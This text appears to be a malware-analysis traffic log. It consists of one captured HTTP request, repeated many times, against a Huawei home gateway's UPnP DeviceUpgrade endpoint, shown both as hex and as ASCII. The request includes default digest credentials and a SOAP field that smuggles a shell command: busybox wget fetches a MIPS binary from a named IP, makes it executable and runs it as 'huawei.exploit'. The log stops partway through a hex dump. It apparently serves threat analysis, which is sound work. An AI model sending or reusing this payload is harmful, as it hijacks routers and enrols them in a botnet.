65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 